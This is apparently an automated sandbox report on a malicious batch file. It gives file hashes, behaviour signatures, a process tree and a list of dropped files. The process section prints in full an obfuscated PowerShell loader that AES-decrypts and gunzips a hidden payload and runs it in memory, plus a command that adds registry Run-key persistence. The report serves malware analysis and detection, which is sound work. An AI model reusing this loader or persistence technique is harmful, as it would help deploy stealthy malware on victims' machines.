Analysis
-
max time kernel
1s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system -
submitted
08/01/2024, 20:50
Static task
static1
Behavioral task
behavioral1
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win10v2004-20231215-en
General
-
Target
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
-
Size
1.6MB
-
MD5
4fbb5e9e5b5690f1b361f9f67d10e25c
-
SHA1
b77eeb5b8b08f5dfa427cd078423e4f190a28c41
-
SHA256
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3
-
SHA512
640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770
-
SSDEEP
24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5076 wrote to memory of 4360 5076 cmd.exe 31 PID 5076 wrote to memory of 4360 5076 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat' -Value '"C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"' -PropertyType 'String'3⤵PID:4140
-
-
Network
MITRE ATT&CK Matrix
Downloads
-
Filesize
1KB
MD5 227556da5e65f6819f477756808c17e4
SHA1 6ffce766e881ca2a60180bb25f4981b183f78279
SHA256 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512 d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize 22KB
MD5 7665a993d32d1486f5508d933f037d90
SHA1 f881a345895f5b093c8b0b1b715bb541380970dd
SHA256 c5aefb45657ad9b15fdb86f3c84baab237de98fea7177eeac0ef8f5c786b93a2
SHA512 058421b50531ed059bc95d9c033e2c26d8e959677359fa1881b8908324eb2c55253a0acb4e640affbd6eaad0057e07da00e9ad662ffa7ae1f7057d6705f71cca
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize 183KB
MD5 a549354b000284df2199996df6542728
SHA1 bee835c67f139026d952169e90cd9e10f7c2161d
SHA256 52d24c03ebea6fd7d3a230203c28defac90f0a91cb5bf0ffb67e04fcd5c05160
SHA512 32f687c5a0a2a7dd2d2f923a06420e506fd297c2f00d2fe65a383a7714dd80095d181e37a634b88c7a0f391a1ef3187daa0a0e541857512c44aa291d2b83fcde
-
Filesize
64KB
MD5 b0ff6c01f2178cc3fa88aa81a684ba96
SHA1 557c9d272bd021fd6bfb52d0492e156d518eb71c
SHA256 0ccbd3caeb13ef25ff0b7b527673d15da9b1d66a37f170067657e747c6d0af74
SHA512 5f1de9ddc7b9f59aa7fb5872c1f96d9e7468d5bafa4715e44d454cf80b6b21fb9bf6285294945a72a39c6f0a60e5f042ec3cdcc6df52e72d15ea945d683a1dae
-
Filesize
61KB
MD5 b49c90679b4d095c347299b90d710780
SHA1 1dd720622f578ee9c7f12739cc021c023d25d227
SHA256 a4e3201a8f8cc042aa37d06104e5ba7de83df6786ca40e4a7fe7e0fc27878d00
SHA512 681bc72e46d55c47c5d93914dd294ed4fc07446c40f8a1c5875c76a2c3569c12db59c9f76351163551dab30ba8a2f95b21a69de909f92c9709cdd05ed63b93ea
-
Filesize
89KB
MD5 89315ade6ec1a810721566d2e4a31bc7
SHA1 7d13c641a26900c97d44d81e0af18f5dfcfb5d41
SHA256 9d085335ea760e155b2866377b122160bad8d609e37ba7d54acea1433453471b
SHA512 56f4e989f92e6ec8f0b3e7d289866267f5162cfca99d56bcf796346565c3e2408e2779e96ce2d1043206a0f843d1b0fc668f6ef07b389c48a771338ecda822a0
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82